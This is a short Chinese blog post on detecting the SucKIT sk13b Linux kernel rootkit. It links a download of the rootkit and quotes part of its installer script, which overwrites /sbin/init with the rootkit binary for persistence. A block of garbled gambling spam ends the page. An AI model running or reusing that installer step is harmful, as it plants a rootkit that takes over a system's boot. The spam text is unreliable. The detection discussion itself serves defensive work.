检测sk13b suckit linux rootkit

看了下面几行,再看看chkrootkit和rkhunter的检测代码,就知道为啥默认安装的suckit sk这么好检测了。检测sk1.x其实还有其他的方法,可以检测隐藏进程,还可以利用sk13b的一些bug来做检测 :) sk13b里还有个好东西,那就是让人怀念的elfuck,经典的ELF加密程序。

顺便发个sk13b的下载地址。04年的东西现在还能用,真没想到,一个内核rootkit写成这样,让那些经常更新还不稳定的软件情何以堪啊。

http://www.xfocus.net/tools/200408/763.html

inst文件是sk的安装包,默认会执行下面的安装指令

\000″ | gzip -d > sk
chmod 0755 sk; if [ ! -f /sbin/init${H} ];  then cp -f /sbin/init /sbin/init${H}; fi; rm -f /sbin/init; cp sk /sbin/init
echo Your home is $D, go there and type ./sk to install
echo us into memory.   Have fun!

[本日志由 kiki 于 2011-01-20 03:24 PM 编辑]
上一篇: Linux/centos减轻/防止DDoS攻击的轻量级小程序,软件防火墙
下一篇: 这19句话 是经典 看到第10句 我忽然就沉默了
文章来自: 素包子
引用通告: 查看所有引用 | 我要引用此文章
Tags: sk13b suckit linux rootkit
相关日志:
评论: 0 | 引用: 0 | 查看次数: 1741

:Ŷij ֽ Ͼ ֳ ϶ ֽIJ Ͼ Ͼֳ ӹ ֳ թ 򿪻 Ͷע Űټ Žɳ ˹ 21 365bet Žɳ Žɳַ ÷ ˹˹ ˹ַ ֽ IJ IJ IJ ij ţ hg0088 ϻ ϻϷ